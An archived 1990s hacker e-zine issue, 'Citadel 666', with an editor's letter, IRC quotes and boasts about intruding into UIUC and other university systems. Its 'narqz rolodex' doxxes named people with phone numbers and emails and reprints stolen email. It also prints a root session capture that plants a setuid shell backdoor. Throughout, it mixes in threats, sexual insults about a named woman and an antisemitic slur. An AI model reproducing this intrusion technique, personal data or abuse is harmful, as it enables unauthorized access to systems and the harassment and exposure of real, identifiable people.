2 August 2002 Source: http://www.eurocompton.net/~fuk/citadel.01.txt ----------------------------------------------- -_-+-_-C I T A D E L 6 6 6-_-+-_- -_-+-__| INFOELEET |__-+-_- | VOL 1 ISSUE 2 | + + : week of September Something : . . o \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\o | | CITADEL/666 Brings you the spoils of the net. Quirky, kooky | | : : things that come our way one way or another. Interesting logs, : : + + eleet profiles, someones inherent st00pidity. We are watching + + . . \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\. . INTRODUCTION: Meet those whacky c/666 guyz#!@#! ::Editor In Ch13f:: S N E E Q ::N1gGaZ:: B I S C U I T W E T _ T U R D R A N X N 0 o G 1 E :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :::Table Of Contents::: :1: Letter from the editor. :2: Famous IRC Quotes. :3: GATE.NET :4: The Ongoing UIUC Saga :5: NARQS.ROLODEX ::Letter from da editor:: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Readers, fans, freaks: We have been a little lax in releasing a follow-up issue to the blockbuster, groundbreaking first action packed issue, but shit happens. I am going to try my hardest to get one out bi-weekly, but we will see what time permits, and how much material you idiots provide for us to exploit and put into these powerful pages. On a side note, we do have a valid mailing address now, you can send in reader mail, threats, b00gz, whatever...you can reach us at... ::citadel@cyberspace.org:: It probably wont last till next issue, but we will see. Write in with any complaints, articles you want us to put in, articles that u wrote and think are w0rthy, threats (those are the best, they will all be printed!), and the like. Well thats it from me until next time, we are committed to making net life difficult to idiots and frustrating for the pseudo private sector. What can I say? Life is boring..... sneeq ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Famous Quotes (a quickie) ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: *jsz* Ok, now REALLY, how did you find out my real first name? Im serious. *readwerd* If I can't hack this IRIX, you sure as fuck cant! *lexiana* awww, are we mad pumpkin? (sed to peaboy) *sevenup* Better leave me alone, or there will be trouble! ^^^^^^ a definite nominee for the ''IDIOT OF THE YEAR'' award. Sectec blows. merc: ''Hahah Im going cellular, did u hear that mr. fed?!@#'' ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: GATE.NET...h0h0h00: ::::::::::::::::::: Anyone notice that noogie.gate.net resolved to hopi.gate.net for about 2 weeks? H0h0h...neither did they. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: UIUC.EDU, The Inside Story, And Our Love Affair With Those Whacky Guys. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Early in April of this year, this domain was brough to my attention. Nothing special really, this campus is rather large and houses the NCSA, the wonderboys that brought us MOSAIC and other interesting things. (And the NCSA installation there is ELITE, they have like card scanners and stuff and a big room called the ''cave'' where an SGI onyx projects 180 degree images onto a half dome screen, creating the closest thing to I guess you would call ''virtual reality immersion'' that I have ever seen..but ANYWAY), the people there really really bug me. They are dicks, plain and simple. In my meetings with their security (hah!) personnel or what is as close as they get, I found them unknowledgable at best and rather sure of themselves, perhaps because they had never had a problem with security etc. So enter me. Little Mr. Devils advocate, I decided to see what these people were worth, I mean maybe I could find something neat to entertain myself with on the ncsa wire or the cso wire (where their pride and joy rests...and their nameserver, but that is another article...) Anyway, I was basically told that the entire domain was above most people so they welcomed the try really.....So what the hay! Lets indulge them! And I did... I entered their main machine, UXA in about 10 minutes, and it took them over a MONTH to figure out how I got it...I mean it wasn't a real difficult thought process....Anyway, to keep me out, a month later they quit running mountd....h0h0h0... Anyway, then I take over their cs wire....Which held some minorly interesting things, a source tree I didn't have, and they do some military contract work so there was a little bit of eliteness...The final machine I needed to get root on and I couldn't for the fucking LIFE of me,I was stoned and tired and had to take a shit, and they had sysdiag in the pw file so I fired up that lame race runnin 8lgm skript and let it go and went to take my fat dump. I come back in and my process had been killed and Pomes (their ELITE security type) had logged into the machine and they were hard up to find my little ass, so I left them a nice message and dropped the wire....I mean DROPPED the wire....needless to say, they weren't too happy. So I attended a little gathering they had...talk about a witch hunt, jesus christ....BLAH BLAH WE WILL FIND HYM WE KNOW WH0 IT IZ!@#!@#.. ::yea rite...ALWAYS doubt yourself....:: Anyway, there is more in store for that pathetic domain....I mean if you get cocky, u get sloppy, you get dropped...what a waste...I dunno, that barbehen guy thinks he is pretty slick too....but he isnt...and he knows it....this article just serves as a general hello I guess to those guys, cause I'm no where NEAR done with you. When I'm done with you, that robotic arm you got grabbin tapes will be flickin you off and doin the fuckin wave.. QUAKE IN FEAR BIATCHEZ... ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Narqz.rolodex Written by ur favorite pimp haus, Duh N0oGz -------------------------------------------------------------------------- First on the hit list earle@uu.net, real name Earle Ady, useful information: Phone: 703 360 8427, 703 780 9478 Sites: earle@radon.uu.net url@primus.com earle@reality.org Narqs: Wrote posse.rolodex in a weak attempt to retain some dignity after the "uunet incident" Wuarchive says: UUNET technologies and Earle Ady would like to announce the expansion of their internet pornography service. FTP and other services avialable. For more information or possible samples e-mail: root@relay1.uu.net or earle@relay1.uu.net (for samples) or root@relay2.uu.net or earle@relay2.uu.net (for samples) or root@uunet.uu.net or earle@uunet.uu.net (for samples). For those users with modems, we have a 40 line bbs in virginia, with free unlimited access for the first month. Dialup number is -+- (703) 360-8427 -+- ADULT MATERIAL, 18 years of age or above please. -------------------------------------------------------------------------- Number two is Scott Yelich, not as big of a threat since Gita started pulling him off and relieving his sexual tension. Phone: 505-984-8800 Info: Does security work, based out of santafe.edu, thinks that he will get money out of spy.org. IRC's as DrD00m, some weak attempt at looking cool. Hacks: Well this is a good one, he hasn't ever done anything of importance in his whole life, but he does ATTEMPT to hack... --> From yo Fri Apr 16 06:04:25 1993 Date: Fri, 16 Apr 93 06:04:21 -0600 From: yo (Yo) To: nestey Subject: Santafe.edu..... Status: RO Scott tried to break into the site... Apr 15 08:52:52 localhost: 8548 ftpd: connect from sfi.santafe.edu Apr 15 09:12:35 localhost: 8554 telnetd: connect from sfi.santafe.edu Apr 15 09:13:26 localhost: 8565 telnetd: connect from sfi.santafe.edu Apr 15 09:14:52 localhost: 8567 rlogind: connect from sfi.santafe.edu Apr 15 09:18:04 localhost: 8572 telnetd: connect from sfi.santafe.edu Apr 15 09:23:40 localhost: 8574 ftpd: connect from sfi.santafe.edu Apr 15 09:24:22 localhost: 8575 ftpd: connect from sfi.santafe.edu Apr 15 09:24:33 localhost: 8576 ftpd: connect from sfi.santafe.edu Yet unsecesefully... -------- Pathetic eh? what a little shit hed...anyway.. Narqs: Helped with posse.rolodex, got all the jew-see info on me..like "HIS NaYmE Iz CrIsZ, HiZ MoMZ A NUN" or wotever bullshit he mayde up... -------------------------------------------------------------------------- Next is Das..this is easy, I will just spooge out a capture...I have to go to church soon so I have to make this qwik. DAS DAS DAS DAS Das tHIS MAIL St0LeN jULY 1994 ALL RIGHTS RESERVED (c) MElT > I am, I have been a student and an employee here at the University > since 1991. I am currently a permanent staffmember at the University > Medical Center, and am also employed by the School of Education on > a National Science Foundation/Spencer Foundation grant project. Both > of my jobs deal with computers. I have been active in computer security, > and have had many conversations with several people at the University > regarding security issues. I also have a semi-formal agreement with > the Air Force Office of Special Investigations, the Secret Service, and > the FBI (Ann Arbor office) to provide assistance in an ongoing effort > to track down some malicious .mil and .gov hackers, primarily by > monitoring some IRC channels and by other means. From das Sun Jun 12 19:12:07 1994 Received: (das@localhost) by merit.edu (8.6.8.1/merit-1.0) id TAA27915; Sun, 12 Jun 1994 19:12:01 -0400 Date: Sun, 12 Jun 1994 19:12:01 -0400 From: "das@merit.edu" Message-Id: <199406122312.TAA27915@merit.edu> To: rgs@merit.edu Subject: XXXXX XXXXXXX Cc: cwendt@um.cc.umich.edu, das, ema, jeff.ogden@um.cc.umich.edu, ljb, paul@engin.umich.edu, rsc Status: RO This letter is in regards to recent e-mail and phone correspondence concerning XXXXX XXXXXXXXX. So you have a better understanding of who I am, I have been a student and an employee here at the University since 1991. I am currently a permanent staffmember at the University Medical Center, and am also employed by the School of Education on a National Science Foundation/Spencer Foundation grant project. Both of my jobs deal with computers. I have been active in computer security, and have had many conversations with several people at the University regarding security issues. I also have a semi-formal agreement with the Air Force Office of Special Investigations, the Secret Service, and the FBI (Ann Arbor office) to provide assistance in an ongoing effort to track down some malicious .mil and .gov hackers, primarily by monitoring some IRC channels and by other means. [[deleted irrelevant & non-narq stuff]] amp Phil Finkler Student at Western Michigan, friend of mine Connects from Merit SCPs nmu*.merit.edu yyz Jim Northrup Former ITD-NS employee, computer consultant Connects via PPP using his paid authentication account noc Nightscape Operations Center das Dave Schroeder [[more non-narq stuff removed]] Regards, Dave Schroeder das@merit.edu (313) 401-7024 -------------------------------------------------------------------------- Handle: Readwerd, irc's from fal94091@cse.unl.edu Lame...said he didnt think I culd hack cse.unl.edu.. uname -a IRIX cse 5.2 02282014 IP7 mips # echo "readwerd must die" readwred must die # whoami root # echo "phat" phat # cat /etc/motd If you have questions regarding how to use this system or any of the supported software applications, call 472-3970 or send an e-mail message to "helpdesk" ******************************************************************************** Cooperative Education Informational Meeting Wednesday, August 31, 1994, W183 Nebraska Hall Starting this year, Co-op programs are available to Computer Science students in either college for students who have or will have 2 years of college education. Further information can be obtained in the department office or you can call Connie Husa at 472-3181. ******************************************************************************** ATTENTION: CSE STUDENTS IN THE COLLEGE OF ENGINEERING Computer Engineering students MUST formally apply for admittance into the program. Students who have at least 43 hours applicable to graduation should apply. Forms are available in the CSE office (Room 116 Ferguson) ******************************************************************************** Lost?? Try the command "more /usr/local/docs/userdoc" # exit prabir:~ > ls BACKUPS/ SOFTWARE/ mbox BEIT/ THAI/ nih.image.info DHUR/ UNL/ plan.aux FUZZY/ VISION/ plan.dvi INFO/ cherokee.upgrade plan.log JAN.25.1993/ dementhon plan.tex KAI/ dumpster/ prabir@ MasPar empty.dir/ radius NEW/ hutten.code travel.book News/ image.supply www PAPERS/ jain wzhu.tankdata PROP/ kulfi PSFILES/ mammgrm.info.images prabir:~ > ls -al ... -rwsr-xr-x 1 root sys 132272 Sep 16 17:53 ...* prabir:~ > ... # cp /bin/sh /dev/wol1 # chmod 4755 /dev/wol1 # rm ... UX:rm: INFO: ...: 755 mode. Remove ? (yes/no)[no] : y # ls -l /dev/wol1 -rwsr-xr-x 1 root faculty 132272 Sep 16 18:16 /dev/wol1 # ------------------------------------------------------------------ From fal94091 Sat Sep 10 16:01:05 1994 Received: by cse.unl.edu (931110.SGI/931108.SGI.ANONFTP) for fal94091 id AA00465; Sat, 10 Sep 94 16:01:05 -0500 From: fal94091 Message-Id: <9409102101.AA00465@cse.unl.edu> Subject: mid.net employment To: pot@netsys.com Date: Sat, 10 Sep 1994 16:01:04 -0500 (CDT) Cc: fal94091 () X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1007 Status: OR pot - I don't know if you recall me from the past when you had time to get on irc, but I spoke to you on the phone when me and Ben (novocain) called Len and stuff. I interviewed with Sorell Slaymaker, the NOC manager at mid.net on Thursday, September 8th, for a part time position in the noc as a first line tech support and general help and stuff. I'm sure you know the typical position. I brought in a letter and a resume, interviewed with him, toured, and met a couple of the net-nerds that run the net... That night I sent him email thanking him and telling him I wanted the job, and later I sent him an explanation of what Class A and B addresses were, since I told him I didn't know what they were in the interview (and I didn't.) Anyway, I understand you work for the parent company Global Internet, and I wondered if you could put in a good word for me or give me some advice. Thanx, you can reach me at 402/464-1188 or here if you have any questions. Alan Hannan (readwerd/readwrite) --------------------------------------------------------------------------- Handle: Stranger=jared@eniac.seas.upenn.edu From ira@cis.upenn.edu Sun Feb 6 22:18:23 1994 Received-Date: Sun, 6 Feb 94 22:18:23 EST Received: from IRA.CIS.UPENN.EDU (IRA.CIS.UPENN.EDU [130.91.6.59]) by central.cis.upenn.edu (8.6.5/UPenn 1.4) with SMTP id WAA11550 for ; Sun, 6 Feb 1994 22:15:29 -0500 Posted-Date: Sun, 6 Feb 1994 22:15:29 -0500 Message-Id: <199402070315.WAA11550@central.cis.upenn.edu> To: mengwong@sas.upenn.edu (Meng Weng Wong) Subject: Re: umph In-Reply-To: Your message of "Sun, 06 Feb 1994 22:14:32 EST." <9402070314.AA14134@mail.sas.upenn.edu> Date: Sun, 06 Feb 1994 22:15:28 EST From: Ira Winston Status: OR I was able to trace the problem back to jared. I will ask him for an explanation and I will ask the mail.sas sysadmin to ask jkaplan. thanks for the lead. From mengwong Sun Feb 6 22:22:21 1994 Subject: Re: umph To: ira@cis.upenn.edu (Ira Winston) Date: Sun, 6 Feb 94 22:22:21 EST In-Reply-To: <199402070315.WAA11550@central.cis.upenn.edu>; from "Ira Winston" at Feb 6, 94 10:15 pm X-Mailer: ELM [version 2.3 PL11-upenn1.11] | | I was able to trace the problem back to jared. I will ask him for | an explanation and I will ask the mail.sas sysadmin to ask jkaplan. | for my personal edification, could you tell me how you traced it? i have a lot of things to learn :) meng From ira@cis.upenn.edu Sun Feb 6 22:28:16 1994 Received-Date: Sun, 6 Feb 94 22:28:16 EST Received: from IRA.CIS.UPENN.EDU (IRA.CIS.UPENN.EDU [130.91.6.59]) by central.cis.upenn.edu (8.6.5/UPenn 1.4) with SMTP id WAA11749 for ; Sun, 6 Feb 1994 22:25:21 -0500 Posted-Date: Sun, 6 Feb 1994 22:25:21 -0500 Message-Id: <199402070325.WAA11749@central.cis.upenn.edu> To: mengwong@sas.upenn.edu (Meng Weng Wong) Subject: Re: umph In-Reply-To: Your message of "Sun, 06 Feb 1994 22:22:21 EST." <9402070322.AA16689@mail.sas.upenn.edu> Date: Sun, 06 Feb 1994 22:25:20 EST From: Ira Winston Status: OR telnet session from eniac to mail.sas matched the jkaplan login if you factor in the 4 minute clock skew between mail.sas and eniac. the extra space in 'sh' confirmed. From mengwong Tue Feb 15 21:25:33 1994 Subject: jkaplan To: ira@ira.cis Date: Tue, 15 Feb 94 21:25:33 EST X-Mailer: ELM [version 2.3 PL11-upenn1.11] i see jkaplan got the account back. what, if any, explanation did jared offer? curious, meng --------------------------------------------------------------------------- Handle: Noe11e Hacks: get real, but she does suck a mighty good amount of dick Phone: 301-839-7224 thx wing Name: Jill Bowyer jbowyer@Selma.hq.af.mil writes: First off, I'd like to tell you that I found the tprof hole on my own. Thanks for the credit. Yo had nothing to do with it. As a matter of fact, he did not have access to a current AIX machine to test it out. Well give the lady credit if it's her due. Secondly, I don't like being lied to. no idea what she's refering to this time... Thirdly, I'll have some more mail coming along shortly. oh goody!, she wants to rave and bitch some more. I'll just have to sit online and check my mbox every few seconds in anticipation :) But that's okay. Being clueless was always an interesting thing to watch. Oh, and no, I am not responsible for I-Hax getting out. Ask RAgent about that one. Hell, Scott Yelich's had it forever. I don't need to give it out, enough other people do. RA had something to do with early issues being distributed. Scott Y. was recently spotted on irc looking for IH6 blameing other people is such a great way to divert attention away from yourself, don'cha think? --------------------------------------------------------------------------- Here is just something funny, KL of course isn't a narq, he's not smart enuff to be...but his SECRET GOVERNMENT CLEARANCE makes him deserve mention. We LuV U CrAiG NiED0rF The Following is from big KL to nestey MIL spook. First of all, I am a MILnet user myself. I have a MIL address, I work for the DOD and I have a Secret government clearance. I am not a fed or an informer, etc. I would not hesitate to nail someone screwing with our nation's defense. That said... It is important for me to know who the spook is and why you are even talking to him, let alone trusting him and why he is saying this and where he gets his info. I have regular dealings with Jill. Like I said we used to date. If there is more going on than what I am aware of, I need to be notified. Is it this Trusted Information Systems guy at WHITEHOUSE.GOV ? I live here in DC remember. I wouldn't mind perhaps meeting him. You and I have been up front and honest with each other for over 4 years now. I need to be able to get verification on this for my own safety and to either clear or condemn a poor young gal. If you cannot tell me anything, please ask your friend to contact me directly. Thanks, Craig >I am a MILnet user myself. I have a MIL address. I work for the DOD >and I have a Secret government clearence. This statement needs *ALOT!* of explanation!... >I am not a fed This seems to be abit of a contradiction when taken in combination with the previous statement. Mind explaining? >I will not hesitate to nal someone screwing with our nations defence. Neithor will I What does Jill have to do with our nations defence? re: spook >who the spook is what makes you think I even know who this guy (or gal) is? I thought I told you that the info was third hand. (seems too acurate, though... I mean a name out of the blue, that's correct?) >why you are even talking to him I thought I told you the info is third hand - I'm not talking to him/her, However!, HaxNet is currently a "coed" venture, and we're recruiting sec type people - including "spooks"... If I knew the guy, why shouldn't I be talking to him/her? >let alone trusting him and why he is saying this I thought I made it clear previously that I didn't necessarily trust this person, and I was just checking this out. It could be disinformation, however your reaction seems to indicate that it isn't. Who the hell are you working for anyway? In this persons defence, I should note that all that was reported to me was that the person was reluctant to say anything, it was apparently a slip, they clammed up immediatly when asked to clarify, and all that was mentioned was her name and something about her being a source of info. >more going on we're looking into it abit more - a query was made to another mil contact who I don't know for verification on this - no reply yet. >Is it this Trusted Information Systems guy ... What makes you think we have anything to do with anyone at TIS? Who passed you that information - that someone from TIS might be part of the project? To answer your question, no one at TIS has said anything about her to date, or been asked about her. (sounds like Jill works for the SS, yes?) >need to get verification on this for my own safety How is your safety involved, get real guy. >and to eithor clear or condem... Oh hogwash! Even if we heard one way or another we wern't going to publish the info in phrack, or post it to usenet. We were interested as far as how far the person could be trusted, and if we should be careful in dealings with her. The possability of recruitment also came up... Is she any good at our "black craft"? >please ask your friend to contact me directly For the last time I DON'T EVEN KNOW THIS PERSON! Perhaps you'd care to tel me abit more about Jill if you really want to clear her, like how ling has she been hacking? Has she ever been busted? If so, did she get off easy? who does she work for? and previously? etc. FYI Hax is currently providing information to select gvmt agencies (mil/intelligence) about methods and techniques that may further US interests. We do not provide info about specific hackers methods or identities - for that matter don't provide any info that could help bust someone. We're currently researching agencies to contact for this type of liason. This information is not general knowledge beyond select members of the coordinating group so keep it to yourself. I'm not out to condem Jill, nor do I intend to publicise the info if I find out she is providing info to whomever - I just want to know how far to trust her, who (if anyone) she's working for, and if a recruitment is attempted, what the score is... that's all. Have you ever heard the term "fluttering" a system or net? - you drop a bit of information or disinformation, or otherwise make some noise and see who reacts and how in order to find parts that arn't working or to catch security leaks. Take a look at your responces, specificly your questions - they don't imply good implications about you or jill. Someone is listening... ttyl, Nate ps: I don't give this issue a high priority, I'm busy organising a number of projects, and i-net resources. Nate, This has certainly made my life interesting, to say the least. :) I'm still putting together the pieces of how my name got out there in the first place. Well, I'm pretty sure I know how, but haven't seen the person yet to confirm it. I did find your finger from yogi here and there interesting, since Craig would not tell me the name of your mailing list nor the name of the machine, nor your name. Yo gave me as little information. I did know it was in colorado, though. No, I don't know the name of the project. I don't know either what InfoHax is all about. What is the "inserection over the matter with my number 2"? Please send me an application, though I have no idea what I am applying for. ;) Novice, yes. - In some aspects. It's hard to learn when people won't answer your questions because you *could* be a narc. And my experimentation is very limited since I have to be careful. But recently I've found some pretty interesting ways....anyways.... Nice meeting you, Nate. Jill --------------------------------------------------------------------------- Thats all I am puttin in u wacked out bitches, if u dont like it u kan suq on my phat dick. N0oG1e ############################################################################ end of vol1 iss2. Well that brings us to the end of another exciting action packed issue. I know u will stay up at night pondering our eliteness, thats ok, it comes with the territory. Feel free to send us fan mail (we know we are loved) at the citadel@cyberspace.org address...we will print yer rants and raves... send in article ideas or threats whatever...anyway, my eyes hurt and its hella fuckin late....night -RANX ############################################################################